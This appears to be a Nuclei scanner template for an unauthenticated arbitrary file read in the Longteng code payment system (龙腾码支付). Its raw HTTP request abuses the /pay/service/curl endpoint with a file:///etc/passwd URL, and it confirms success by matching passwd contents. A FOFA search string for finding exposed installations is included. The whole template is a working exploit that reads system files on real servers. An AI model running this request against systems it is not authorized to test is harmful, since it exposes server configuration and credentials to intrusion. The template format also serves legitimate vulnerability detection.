http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - root:x
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: longteng-curl-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/epaydoc/epaydoc.php" && body="/sdk"
         龙腾码支付 /pay/service/curl 接口处存在任意文件读取漏洞，未经身份验证的攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 龙腾码支付 /pay/service/curl 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/BBckUUZ0HF0yO0vS-LoDPA
    severity: high
    tags:
        - File reading
